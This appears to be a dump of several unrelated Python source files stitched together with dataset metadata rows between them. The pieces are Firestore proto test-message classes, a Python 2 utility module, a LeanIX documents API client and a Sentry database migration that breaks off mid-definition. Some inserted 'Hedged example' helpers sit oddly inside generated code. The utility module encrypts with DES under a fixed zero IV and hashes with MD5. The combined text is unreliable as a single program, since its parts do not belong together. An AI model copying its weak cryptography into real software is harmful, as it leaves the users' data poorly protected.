class GetTest(proto.Message):
r"""Call to the DocumentRef.Get method.
Attributes:
doc_ref_path (str):
The path of the doc, e.g.
"projects/projectID/databases/(default)/documents/C/d".
request (google.cloud.firestore_v1.types.GetDocumentRequest):
The request that the call should send to the
Firestore service.
"""
doc_ref_path = proto.Field(proto.STRING, number=1)
request = proto.Field(
proto.MESSAGE, number=2, message=firestore.GetDocumentRequest,
)
class CreateTest(proto.Message):
r"""Call to DocumentRef.Create.
Attributes:
doc_ref_path (str):
The path of the doc, e.g.
"projects/projectID/databases/(default)/documents/C/d".
json_data (str):
The data passed to Create, as JSON. The
strings "Delete" and "ServerTimestamp" denote
the two special sentinel values. Values that
could be interpreted as integers (i.e. digit
strings) should be treated as integers.
request (google.cloud.firestore_v1.types.CommitRequest):
The request that the call should generate.
is_error (bool):
If true, the call should result in an error
without generating a request. If this is true,
request should not be set.
"""
doc_ref_path = proto.Field(proto.STRING, number=1)
json_data = proto.Field(proto.STRING, number=2)
request = proto.Field(proto.MESSAGE, number=3, message=firestore.CommitRequest,)
is_error = proto.Field(proto.BOOL, number=4)
class SetTest(proto.Message):
r"""A call to DocumentRef.Set.
Attributes:
doc_ref_path (str):
path of doc
option (google.cloud.firestore_v1.types.SetOption):
option to the Set call, if any
json_data (str):
data (see CreateTest.json_data)
request (google.cloud.firestore_v1.types.CommitRequest):
expected request
is_error (bool):
call signals an error
"""
doc_ref_path = proto.Field(proto.STRING, number=1)
option = proto.Field(proto.MESSAGE, number=2, message="SetOption",)
json_data = proto.Field(proto.STRING, number=3)
request = proto.Field(proto.MESSAGE, number=4, message=firestore.CommitRequest,)
is_error = proto.Field(proto.BOOL, number=5)
class UpdateTest(proto.Message):
r"""A call to the form of DocumentRef.Update that represents the
data as a map or dictionary.
Attributes:
doc_ref_path (str):
path of doc
precondition (google.cloud.firestore_v1.types.Precondition):
precondition in call, if any
json_data (str):
data (see CreateTest.json_data)
request (google.cloud.firestore_v1.types.CommitRequest):
expected request
is_error (bool):
call signals an error
"""
doc_ref_path = proto.Field(proto.STRING, number=1)
precondition = proto.Field(proto.MESSAGE, number=2, message=common.Precondition,)
json_data = proto.Field(proto.STRING, number=3)
request = proto.Field(proto.MESSAGE, number=4, message=firestore.CommitRequest,)
is_error = proto.Field(proto.BOOL, number=5)
class UpdatePathsTest(proto.Message):
r"""A call to the form of DocumentRef.Update that represents the
data as a list of field paths and their values.
Attributes:
doc_ref_path (str):
path of doc
precondition (google.cloud.firestore_v1.types.Precondition):
precondition in call, if any
field_paths (Sequence[google.cloud.firestore_v1.types.FieldPath]):
parallel sequences: field_paths[i] corresponds to
json_values[i]
json_values (Sequence[str]):
the argument values, as JSON
request (google.cloud.firestore_v1.types.CommitRequest):
            expected request
is_error (bool):
call signals an error
"""
doc_ref_path = proto.Field(proto.STRING, number=1)
precondition = proto.Field(proto.MESSAGE, number=2, message=common.Precondition,)
field_paths = proto.RepeatedField(proto.MESSAGE, number=3, message="FieldPath",)
json_values = proto.RepeatedField(proto.STRING, number=4)
request = proto.Field(proto.MESSAGE, number=5, message=firestore.CommitRequest,)
is_error = proto.Field(proto.BOOL, number=6)
class DeleteTest(proto.Message):
    r"""A call to DocumentRef.Delete
Attributes:
doc_ref_path (str):
path of doc
precondition (google.cloud.firestore_v1.types.Precondition):
request (google.cloud.firestore_v1.types.CommitRequest):
            expected request
is_error (bool):
call signals an error
"""
doc_ref_path = proto.Field(proto.STRING, number=1)
precondition = proto.Field(proto.MESSAGE, number=2, message=common.Precondition,)
request = proto.Field(proto.MESSAGE, number=3, message=firestore.CommitRequest,)
is_error = proto.Field(proto.BOOL, number=4)
class SetOption(proto.Message):
r"""An option to the DocumentRef.Set call.
Attributes:
all_ (bool):
if true, merge all fields ("fields" is
ignored).
fields (Sequence[google.cloud.firestore_v1.types.FieldPath]):
field paths for a Merge option
"""
all_ = proto.Field(proto.BOOL, number=1)
fields = proto.RepeatedField(proto.MESSAGE, number=2, message="FieldPath",)
class QueryTest(proto.Message):
r"""
Attributes:
coll_path (str):
path of collection, e.g.
"projects/projectID/databases/(default)/documents/C".
clauses (Sequence[google.cloud.firestore_v1.types.Clause]):
query (google.cloud.firestore_v1.types.StructuredQuery):
is_error (bool):
"""
coll_path = proto.Field(proto.STRING, number=1)
clauses = proto.RepeatedField(proto.MESSAGE, number=2, message="Clause",)
query = proto.Field(proto.MESSAGE, number=3, message=gcf_query.StructuredQuery,)
is_error = proto.Field(proto.BOOL, number=4)
class Clause(proto.Message):
r"""
Attributes:
select (google.cloud.firestore_v1.types.Select):
where (google.cloud.firestore_v1.types.Where):
order_by (google.cloud.firestore_v1.types.OrderBy):
offset (int):
limit (int):
start_at (google.cloud.firestore_v1.types.Cursor_):
start_after (google.cloud.firestore_v1.types.Cursor_):
end_at (google.cloud.firestore_v1.types.Cursor_):
end_before (google.cloud.firestore_v1.types.Cursor_):
"""
select = proto.Field(proto.MESSAGE, number=1, oneof="clause", message="Select",)
where = proto.Field(proto.MESSAGE, number=2, oneof="clause", message="Where",)
order_by = proto.Field(proto.MESSAGE, number=3, oneof="clause", message="OrderBy",)
offset = proto.Field(proto.INT32, number=4, oneof="clause")
limit = proto.Field(proto.INT32, number=5, oneof="clause")
start_at = proto.Field(proto.MESSAGE, number=6, oneof="clause", message="Cursor_",)
start_after = proto.Field(
proto.MESSAGE, number=7, oneof="clause", message="Cursor_",
)
end_at = proto.Field(proto.MESSAGE, number=8, oneof="clause", message="Cursor_",)
end_before = proto.Field(
proto.MESSAGE, number=9, oneof="clause", message="Cursor_",
)
class Select(proto.Message):
r"""
Attributes:
fields (Sequence[google.cloud.firestore_v1.types.FieldPath]):
"""
fields = proto.RepeatedField(proto.MESSAGE, number=1, message="FieldPath",)
class Where(proto.Message):
r"""
Attributes:
path (google.cloud.firestore_v1.types.FieldPath):
op (str):
json_value (str):
"""
path = proto.Field(proto.MESSAGE, number=1, message="FieldPath",)
op = proto.Field(proto.STRING, number=2)
json_value = proto.Field(proto.STRING, number=3)
class OrderBy(proto.Message):
r"""
Attributes:
path (google.cloud.firestore_v1.types.FieldPath):
direction (str):
"asc" or "desc".
"""
path = proto.Field(proto.MESSAGE, number=1, message="FieldPath",)
direction = proto.Field(proto.STRING, number=2)
class Cursor_(proto.Message):
r"""
Attributes:
doc_snapshot (google.cloud.firestore_v1.types.DocSnapshot):
one of:
json_values (Sequence[str]):
"""
doc_snapshot = proto.Field(proto.MESSAGE, number=1, message="DocSnapshot",)
json_values = proto.RepeatedField(proto.STRING, number=2)
class DocSnapshot(proto.Message):
r"""
Attributes:
path (str):
json_data (str):
"""
path = proto.Field(proto.STRING, number=1)
json_data = proto.Field(proto.STRING, number=2)
class FieldPath(proto.Message):
r"""
Attributes:
field (Sequence[str]):
"""
field = proto.RepeatedField(proto.STRING, number=1)
class ListenTest(proto.Message):
r"""A test of the Listen streaming RPC (a.k.a. FireStore watch). If the
sequence of responses is provided to the implementation, it should
produce the sequence of snapshots. If is_error is true, an error
should occur after the snapshots.
The tests assume that the query is
Collection("projects/projectID/databases/(default)/documents/C").OrderBy("a",
Ascending)
The watch target ID used in these tests is 1. Test interpreters
should either change their client's ID for testing, or change the ID
in the tests before running them.
Attributes:
responses (Sequence[google.cloud.firestore_v1.types.ListenResponse]):
snapshots (Sequence[google.cloud.firestore_v1.types.Snapshot]):
is_error (bool):
"""
responses = proto.RepeatedField(
proto.MESSAGE, number=1, message=firestore.ListenResponse,
)
snapshots = proto.RepeatedField(proto.MESSAGE, number=2, message="Snapshot",)
is_error = proto.Field(proto.BOOL, number=3)
class Snapshot(proto.Message):
r"""
Attributes:
docs (Sequence[google.cloud.firestore_v1.types.Document]):
changes (Sequence[google.cloud.firestore_v1.types.DocChange]):
read_time (google.protobuf.timestamp_pb2.Timestamp):
"""
docs = proto.RepeatedField(proto.MESSAGE, number=1, message=document.Document,)
changes = proto.RepeatedField(proto.MESSAGE, number=2, message="DocChange",)
read_time = proto.Field(proto.MESSAGE, number=3, message=timestamp.Timestamp,)
class DocChange(proto.Message):
r"""
Attributes:
kind (google.cloud.firestore_v1.types.DocChange.Kind):
doc (google.cloud.firestore_v1.types.Document):
old_index (int):
new_index (int):
"""
class Kind(proto.Enum):
r""""""
KIND_UNSPECIFIED = 0
ADDED = 1
REMOVED = 2
MODIFIED = 3
kind = proto.Field(proto.ENUM, number=1, enum=Kind,)
doc = proto.Field(proto.MESSAGE, number=2, message=document.Document,)
old_index = proto.Field(proto.INT32, number=3)
new_index = proto.Field(proto.INT32, number=4)
__all__ = tuple(sorted(__protobuf__.manifest))
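# Hedged example: a minimal sketch showing how the generated proto-plus messages
# above can be instantiated from test helpers; the field values are placeholders
# and this function is not part of the generated module.
def _example_build_get_test_file():
    """Illustrative only: build a TestFile containing a single GetTest."""
    test = Test(
        description="basic get",
        get=GetTest(
            doc_ref_path="projects/projectID/databases/(default)/documents/C/d",
        ),
    )
    return TestFile(tests=[test])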
| apache-2.0 | 2,782,277,068,443,814,000 | 26.403013 | 87 | 0.647447 | false |
9wfox/mvc | utility.py | 1 | 6713 | # -*- coding:utf-8 -*-
"""
    Utilities
    History:
        2011-08-03 + Refactored get_pys_members.
        2011-08-15 * Modified conv_mongo_object to support ObjectId.
        2011-08-20 + Added template_path, static_path.
        2011-08-25 * Moved the argument checking functions over from loigc.
        2011-08-27 * Refactored get_pys_members and renamed it to get_members.
"""
from datetime import datetime
from sys import argv
from os import walk, listdir
from os.path import abspath, join as path_join, dirname, basename, splitext
from fnmatch import fnmatch
from hashlib import md5
from base64 import b64encode, b64decode
from inspect import ismodule, getmembers
from bson.objectid import ObjectId
try:
from pyDes import des, triple_des, PAD_PKCS5, CBC
_enc_key = lambda length: __conf__.ENCRYPT_KEY.zfill(length)[:length]
_cipher = lambda: des(_enc_key(8), mode = CBC, IV = "\0" * 8, padmode = PAD_PKCS5)
except:
pass
### Application path functions ########################################################################
ROOT_PATH = dirname(abspath(argv[0]))
app_path = lambda n: path_join(ROOT_PATH, n)
template_path = lambda n: path_join(ROOT_PATH, "{0}/{1}".format(__conf__.TEMPLATE_DIR_NAME, n))
static_path = lambda n: path_join(ROOT_PATH, "{0}/{1}".format(__conf__.STATIC_DIR_NAME, n))
### Decorators #########################################################################################
def staticclass(cls):
def new(cls, *args, **kwargs):
raise RuntimeError("Static Class")
setattr(cls, "__new__", staticmethod(new))
return cls
class sealedclass(type):
"""
metaclass: Sealed Class
"""
_types = set()
def __init__(cls, name, bases, attr):
for t in bases:
if t in cls._types: raise SyntaxError("sealed class")
cls._types.add(cls)
class partialclass(type):
"""
metaclass: Partial Class
class A(object):
y = 456
def test(self): print "test"
class B(object):
__metaclass__ = partialclass
__mainclass__ = A
x = 1234
def do(self):
self.test()
print self.x, self.y
A().do()
"""
def __init__(cls, name, bases, attr):
print "cls:", cls
print "name:", name
print "bases:", bases
print "attr:", attr
main_class = attr.pop("__mainclass__")
map(lambda a: setattr(main_class, a[0], a[1]), [(k, v) for k, v in attr.items() if "__" not in k])
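# Hedged example: a quick sketch of the decorators above. staticclass blocks
# instantiation while class attributes remain usable; the demo class below is
# illustrative only and is not exported via __all__.
@staticclass
class _ExampleConstants(object):
    VERSION = "1.0"
    # _ExampleConstants() raises RuntimeError("Static Class"), while
    # _ExampleConstants.VERSION stays accessible.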
### Miscellaneous functions ############################################################################
def get_modules(pkg_name, module_filter = None):
"""
        Return all modules in the package that satisfy the filter.
        Arguments:
            pkg_name        package name
            module_filter   module name filter: def (module_name)
"""
path = app_path(pkg_name)
#py_filter = lambda f: all((fnmatch(f, "*.py"), not f.startswith("__"), module_filter and module_filter(f) or True))
    py_filter = lambda f: all((fnmatch(f, "*.pyc") or fnmatch(f, "*.py"), not f.startswith("__"), module_filter(f) if module_filter else True))
names = [splitext(n)[0] for n in listdir(path) if py_filter(n)]
return [__import__("{0}.{1}".format(pkg_name, n)).__dict__[n] for n in names]
def get_members(pkg_name, module_filter = None, member_filter = None):
"""
        Return all matching members from the modules in the package.
        Arguments:
            pkg_name        package name
            module_filter   module name filter: def (module_name)
            member_filter   member filter: def member_filter(module_member_object)
"""
modules = get_modules(pkg_name, module_filter)
ret = {}
for m in modules:
members = dict(("{0}.{1}".format(v.__module__, k), v) for k, v in getmembers(m, member_filter))
ret.update(members)
return ret
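# Hedged example: a sketch of how get_modules/get_members might be used to
# auto-discover classes. The "action" package name and both filters are
# illustrative assumptions, not part of this module.
def _example_collect_members():
    """Illustrative only: map of 'module.name' -> class object from an 'action' package."""
    return get_members("action",
                       module_filter=lambda file_name: not file_name.startswith("test"),
                       member_filter=lambda obj: isinstance(obj, type))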
def set_default_encoding():
"""
        Set the system default encoding
"""
import sys, locale
reload(sys)
lang, coding = locale.getdefaultlocale()
#sys.setdefaultencoding(coding)
def conv_mongo_object(d):
"""
        Convert values inside a MongoDB result:
        (1) Unicode back to str.
        (2) ObjectId (and datetime) back to str.
"""
if isinstance(d, (unicode, ObjectId, datetime)):
return str(d)
elif isinstance(d, (list, tuple)):
return [conv_mongo_object(x) for x in d]
elif isinstance(d, dict):
return dict([(conv_mongo_object(k), conv_mongo_object(v)) for k, v in d.items()])
else:
return d
mongo_conv = conv_mongo_object
### Hashing and encryption functions ###################################################################
def hash2(o):
"""
        Hash function (MD5 hex digest)
"""
return md5(str(o)).hexdigest()
def encrypt(s, base64 = False):
"""
        Symmetric encryption function
"""
e = _cipher().encrypt(s)
return base64 and b64encode(e) or e
def decrypt(s, base64 = False):
"""
        Symmetric decryption function
"""
return _cipher().decrypt(base64 and b64decode(s) or s)
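# Hedged example: a round-trip sketch for the helpers above. It assumes pyDes is
# installed and __conf__.ENCRYPT_KEY is configured (otherwise _cipher is
# undefined); the plaintext value is a placeholder.
def _example_crypto_roundtrip():
    """Illustrative only: encrypt then decrypt a value, returning True on success."""
    token = encrypt("secret-value", base64=True)
    return decrypt(token, base64=True) == "secret-value"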
### Argument checking functions ########################################################################
def not_null(*args):
"""
        Check that no argument is None
"""
if not all(map(lambda v: v is not None, args)):
raise ValueError("Argument must be not None/Null!")
def not_empty(*args):
"""
        Check that no argument is None, zero or empty
"""
if not all(args):
raise ValueError("Argument must be not None/Null/Zero/Empty!")
def args_range(min_value, max_value, *args):
"""
        Check that every argument is within [min_value, max_value]
"""
not_null(*args)
if not all(map(lambda v: min_value <= v <= max_value, args)):
raise ValueError("Argument must be between {0} and {1}!".format(min_value, max_value))
def args_length(min_len, max_len, *args):
"""
        Check that every argument's length is within [min_len, max_len]
"""
not_null(*args)
if not all(map(lambda v: min_len <= len(v) <= max_len, args)):
raise ValueError("Argument length must be between {0} and {1}!".format(min_len, max_len))
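# Hedged example: how the argument checking helpers above might guard a function;
# the field names and bounds are placeholders.
def _example_create_account(name, age):
    """Illustrative only: raises ValueError when the input is invalid."""
    not_empty(name)
    args_length(1, 32, name)
    args_range(0, 150, age)
    return {"name": name, "age": age}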
__all__ = ["ROOT_PATH", "app_path", "template_path", "static_path",
"staticclass", "sealedclass", "partialclass",
"get_modules", "get_members",
"conv_mongo_object", "mongo_conv", "set_default_encoding",
"hash2", "encrypt", "decrypt",
"not_null", "not_empty", "args_range", "args_length"]
| mit | 6,438,945,186,189,151,000 | 24.227273 | 142 | 0.507799 | false |
leanix/leanix-sdk-python | src/leanix/DocumentsApi.py | 1 | 11645 | #!/usr/bin/env python
"""
The MIT License (MIT)
Copyright (c) 2017 LeanIX GmbH
Permission is hereby granted, free of charge, to any person obtaining a copy of
this software and associated documentation files (the "Software"), to deal in
the Software without restriction, including without limitation the rights to
use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
the Software, and to permit persons to whom the Software is furnished to do so,
subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
NOTE: This class is auto generated by the swagger code generator program. Do not edit the class manually.
"""
import sys
import os
from models import *
class DocumentsApi(object):
def __init__(self, apiClient):
self.apiClient = apiClient
def getDocuments(self, **kwargs):
"""
Read all documents
Args:
relations, bool: If set to true, all relations of the Fact Sheet are fetched as well. Fetching all relations can be slower. Default: false. (optional)
filter, str: Full-text filter (optional)
referenceSystem, str: Reference system filter, e.g. Signavio (optional)
referenceID, str: ReferenceID, e.g. Signavio ID (optional)
factSheetID, str: FactSheetID, e.g. LeanIX ID (optional)
Returns: Array[Document]
"""
allParams = ['relations', 'filter', 'referenceSystem', 'referenceID', 'factSheetID']
params = locals()
for (key, val) in params['kwargs'].iteritems():
if key not in allParams:
raise TypeError("Got an unexpected keyword argument '%s' to method getDocuments" % key)
params[key] = val
del params['kwargs']
resourcePath = '/documents'
resourcePath = resourcePath.replace('{format}', 'json')
method = 'GET'
queryParams = {}
headerParams = {}
formParams = {}
bodyParam = None
if ('relations' in params):
queryParams['relations'] = self.apiClient.toPathValue(params['relations'])
if ('filter' in params):
queryParams['filter'] = self.apiClient.toPathValue(params['filter'])
if ('referenceSystem' in params):
queryParams['referenceSystem'] = self.apiClient.toPathValue(params['referenceSystem'])
if ('referenceID' in params):
queryParams['referenceID'] = self.apiClient.toPathValue(params['referenceID'])
if ('factSheetID' in params):
queryParams['factSheetID'] = self.apiClient.toPathValue(params['factSheetID'])
if formParams:
headerParams['Content-type'] = 'application/x-www-form-urlencoded'
# postData = (formParams if formParams else bodyParam)
postData = params['body'] if 'body' in params else None
response = self.apiClient.callAPI(resourcePath, method, queryParams,
postData, headerParams)
if not response:
return None
responseObject = self.apiClient.deserialize(response, 'Array[Document]')
return responseObject
def createDocument(self, **kwargs):
"""
Create a new Document
Args:
body, Document: Message-Body (optional)
Returns: Document
"""
allParams = ['body']
params = locals()
for (key, val) in params['kwargs'].iteritems():
if key not in allParams:
raise TypeError("Got an unexpected keyword argument '%s' to method createDocument" % key)
params[key] = val
del params['kwargs']
resourcePath = '/documents'
resourcePath = resourcePath.replace('{format}', 'json')
method = 'POST'
queryParams = {}
headerParams = {}
formParams = {}
bodyParam = None
if formParams:
headerParams['Content-type'] = 'application/x-www-form-urlencoded'
if ('' in params):
bodyParam = params['']
# postData = (formParams if formParams else bodyParam)
postData = params['body'] if 'body' in params else None
response = self.apiClient.callAPI(resourcePath, method, queryParams,
postData, headerParams)
if not response:
return None
responseObject = self.apiClient.deserialize(response, 'Document')
return responseObject
def getDocument(self, ID, **kwargs):
"""
Read a Document by a given ID
Args:
ID, str: Unique ID (required)
relations, bool: If set to true, all relations of the Fact Sheet are fetched as well. Fetching all relations can be slower. Default: false. (optional)
Returns: Document
"""
allParams = ['ID', 'relations']
params = locals()
for (key, val) in params['kwargs'].iteritems():
if key not in allParams:
raise TypeError("Got an unexpected keyword argument '%s' to method getDocument" % key)
params[key] = val
del params['kwargs']
resourcePath = '/documents/{ID}'
resourcePath = resourcePath.replace('{format}', 'json')
method = 'GET'
queryParams = {}
headerParams = {}
formParams = {}
bodyParam = None
if ('relations' in params):
queryParams['relations'] = self.apiClient.toPathValue(params['relations'])
if ('ID' in params):
replacement = str(self.apiClient.toPathValue(params['ID']))
resourcePath = resourcePath.replace('{' + 'ID' + '}',
replacement)
if formParams:
headerParams['Content-type'] = 'application/x-www-form-urlencoded'
# postData = (formParams if formParams else bodyParam)
postData = params['body'] if 'body' in params else None
response = self.apiClient.callAPI(resourcePath, method, queryParams,
postData, headerParams)
if not response:
return None
responseObject = self.apiClient.deserialize(response, 'Document')
return responseObject
def updateDocument(self, ID, **kwargs):
"""
Update a Document by a given ID
Args:
ID, str: Unique ID (required)
body, Document: Message-Body (optional)
Returns: Document
"""
allParams = ['ID', 'body']
params = locals()
for (key, val) in params['kwargs'].iteritems():
if key not in allParams:
raise TypeError("Got an unexpected keyword argument '%s' to method updateDocument" % key)
params[key] = val
del params['kwargs']
resourcePath = '/documents/{ID}'
resourcePath = resourcePath.replace('{format}', 'json')
method = 'PUT'
queryParams = {}
headerParams = {}
formParams = {}
bodyParam = None
if ('ID' in params):
replacement = str(self.apiClient.toPathValue(params['ID']))
resourcePath = resourcePath.replace('{' + 'ID' + '}',
replacement)
if formParams:
headerParams['Content-type'] = 'application/x-www-form-urlencoded'
if ('' in params):
bodyParam = params['']
# postData = (formParams if formParams else bodyParam)
postData = params['body'] if 'body' in params else None
response = self.apiClient.callAPI(resourcePath, method, queryParams,
postData, headerParams)
if not response:
return None
responseObject = self.apiClient.deserialize(response, 'Document')
return responseObject
def deleteDocument(self, ID, **kwargs):
"""
Delete a Document by a given ID
Args:
ID, str: Unique ID (required)
Returns:
"""
allParams = ['ID']
params = locals()
for (key, val) in params['kwargs'].iteritems():
if key not in allParams:
raise TypeError("Got an unexpected keyword argument '%s' to method deleteDocument" % key)
params[key] = val
del params['kwargs']
resourcePath = '/documents/{ID}'
resourcePath = resourcePath.replace('{format}', 'json')
method = 'DELETE'
queryParams = {}
headerParams = {}
formParams = {}
bodyParam = None
if ('ID' in params):
replacement = str(self.apiClient.toPathValue(params['ID']))
resourcePath = resourcePath.replace('{' + 'ID' + '}',
replacement)
if formParams:
headerParams['Content-type'] = 'application/x-www-form-urlencoded'
# postData = (formParams if formParams else bodyParam)
postData = params['body'] if 'body' in params else None
response = self.apiClient.callAPI(resourcePath, method, queryParams,
postData, headerParams)
def updateDataObject(self, ID, **kwargs):
"""
Update the data object for the given document ID
Args:
ID, str: Unique ID (required)
body, DataObject: Message-Body (optional)
Returns: DataObject
"""
allParams = ['ID', 'body']
params = locals()
for (key, val) in params['kwargs'].iteritems():
if key not in allParams:
raise TypeError("Got an unexpected keyword argument '%s' to method updateDataObject" % key)
params[key] = val
del params['kwargs']
resourcePath = '/documents/{ID}/dataobjects'
resourcePath = resourcePath.replace('{format}', 'json')
method = 'PUT'
queryParams = {}
headerParams = {}
formParams = {}
bodyParam = None
if ('ID' in params):
replacement = str(self.apiClient.toPathValue(params['ID']))
resourcePath = resourcePath.replace('{' + 'ID' + '}',
replacement)
if formParams:
headerParams['Content-type'] = 'application/x-www-form-urlencoded'
if ('' in params):
bodyParam = params['']
# postData = (formParams if formParams else bodyParam)
postData = params['body'] if 'body' in params else None
response = self.apiClient.callAPI(resourcePath, method, queryParams,
postData, headerParams)
if not response:
return None
responseObject = self.apiClient.deserialize(response, 'DataObject')
return responseObject
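# Hedged example: a minimal usage sketch, assuming a configured ApiClient instance
# compatible with the constructor above (it must provide callAPI, toPathValue and
# deserialize). The filter value is a placeholder; this function is not part of
# the generated SDK class.
def _example_list_documents(api_client):
    """Illustrative only: fetch documents filtered by a full-text search term."""
    documents_api = DocumentsApi(api_client)
    return documents_api.getDocuments(filter="architecture", relations=True)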
| mit | -3,196,921,589,828,660,000 | 30.136364 | 162 | 0.575784 | false |
mvaled/sentry | src/sentry/south_migrations/0480_incidentactivity.py | 1 | 136910 | # -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
# Flag to indicate if this migration is too risky
# to run online and needs to be coordinated for offline
is_dangerous = False
def forwards(self, orm):
# Adding model 'IncidentActivity'
db.create_table('sentry_incidentactivity', (
('id', self.gf('sentry.db.models.fields.bounded.BoundedBigAutoField')(primary_key=True)),
('incident', self.gf('sentry.db.models.fields.foreignkey.FlexibleForeignKey')(
to=orm['sentry.Incident'])),
('user', self.gf('sentry.db.models.fields.foreignkey.FlexibleForeignKey')(
to=orm['sentry.User'], null=True)),
('type', self.gf('django.db.models.fields.IntegerField')()),
('value', self.gf('django.db.models.fields.TextField')(null=True)),
('previous_value', self.gf('django.db.models.fields.TextField')(null=True)),
('comment', self.gf('django.db.models.fields.TextField')(null=True)),
('event_stats_snapshot', self.gf('sentry.db.models.fields.foreignkey.FlexibleForeignKey')(
to=orm['sentry.TimeSeriesSnapshot'], null=True)),
('date_added', self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now)),
))
db.send_create_signal('sentry', ['IncidentActivity'])
# Adding model 'TimeSeriesSnapshot'
db.create_table('sentry_timeseriessnapshot', (
('id', self.gf('sentry.db.models.fields.bounded.BoundedBigAutoField')(primary_key=True)),
('start', self.gf('django.db.models.fields.DateTimeField')()),
('end', self.gf('django.db.models.fields.DateTimeField')()),
('values', self.gf('sentry.db.models.fields.array.ArrayField')(
of=(u'django.db.models.fields.IntegerField', [], {}))),
('period', self.gf('django.db.models.fields.IntegerField')()),
('date_added', self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now)),
))
db.send_create_signal('sentry', ['TimeSeriesSnapshot'])
def backwards(self, orm):
# Deleting model 'IncidentActivity'
db.delete_table('sentry_incidentactivity')
# Deleting model 'TimeSeriesSnapshot'
db.delete_table('sentry_timeseriessnapshot')
models = {
'sentry.activity': {
'Meta': {'unique_together': '()', 'object_name': 'Activity', 'index_together': '()'},
'data': ('sentry.db.models.fields.gzippeddict.GzippedDictField', [], {'null': 'True'}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']", 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ident': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'type': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']", 'null': 'True'})
},
'sentry.apiapplication': {
'Meta': {'unique_together': '()', 'object_name': 'ApiApplication', 'index_together': '()'},
'allowed_origins': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'client_id': ('django.db.models.fields.CharField', [], {'default': "'12bc89ca7374404ea6921393b99c2e83ca9087accd2345a19bc5c5fc3892410a'", 'unique': 'True', 'max_length': '64'}),
'client_secret': ('sentry.db.models.fields.encrypted.EncryptedTextField', [], {'default': "'3b5eb3fdb9a44c908cc9392a5fd7b133e999526dea0d455ea24fc3cd719a22c0'"}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'homepage_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'default': "'Quiet Spaniel'", 'max_length': '64', 'blank': 'True'}),
'owner': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"}),
'privacy_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True'}),
'redirect_uris': ('django.db.models.fields.TextField', [], {}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'db_index': 'True'}),
'terms_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True'})
},
'sentry.apiauthorization': {
'Meta': {'unique_together': "(('user', 'application'),)", 'object_name': 'ApiAuthorization', 'index_together': '()'},
'application': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.ApiApplication']", 'null': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'scope_list': ('sentry.db.models.fields.array.ArrayField', [], {'of': (u'django.db.models.fields.TextField', [], {})}),
'scopes': ('django.db.models.fields.BigIntegerField', [], {'default': 'None'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"})
},
'sentry.apigrant': {
'Meta': {'unique_together': '()', 'object_name': 'ApiGrant', 'index_together': '()'},
'application': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.ApiApplication']"}),
'code': ('django.db.models.fields.CharField', [], {'default': "'20e6168c01b8433daaf1d95b568cec7e'", 'max_length': '64', 'db_index': 'True'}),
'expires_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2019, 5, 16, 0, 0)', 'db_index': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'redirect_uri': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'scope_list': ('sentry.db.models.fields.array.ArrayField', [], {'of': (u'django.db.models.fields.TextField', [], {})}),
'scopes': ('django.db.models.fields.BigIntegerField', [], {'default': 'None'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"})
},
'sentry.apikey': {
'Meta': {'unique_together': '()', 'object_name': 'ApiKey', 'index_together': '()'},
'allowed_origins': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32'}),
'label': ('django.db.models.fields.CharField', [], {'default': "'Default'", 'max_length': '64', 'blank': 'True'}),
